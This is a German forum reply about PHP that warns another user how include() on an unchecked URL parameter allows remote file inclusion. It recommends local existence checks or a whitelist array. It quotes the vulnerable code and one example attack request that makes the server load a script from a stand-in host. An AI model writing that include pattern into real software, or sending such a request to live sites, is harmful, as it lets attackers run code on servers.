title image


Smiley Re: Formularübergabe mit register_globals Off geht nicht mehr
> include($Datei.'.dat');

> <a href="start.php?Datei=start1" >...

Mach sowas *niemals*! Das ist virtueller Selbstmord! Was meist du was passiert, wenn jemand die Seite mit start.php?Datei=http://example.com/boesesscript aufruft? Richtig, http://example.com/boesesscript.dat wird eingebunden und ausgeführt - du musst _immer_ überprüfen, ob die Datei die eingebunden werden soll auf dem lokalen Dateisystem existiert[1]. Prüfe importierte Parameter. Traue niemandem



Gruß,

Tobias



[1] alternativ kannst du auch ein Array erstellen, das die Dateien die eingebunden werden sollen enthält und dessen Keys per URL übergeben werden.

geschrieben von

Login

E-Mail:
  

Passwort:
  

Beitrag anfügen

Symbol:
 
 
 
 
 
 
 
 
 
 
 
 
 

Überschrift: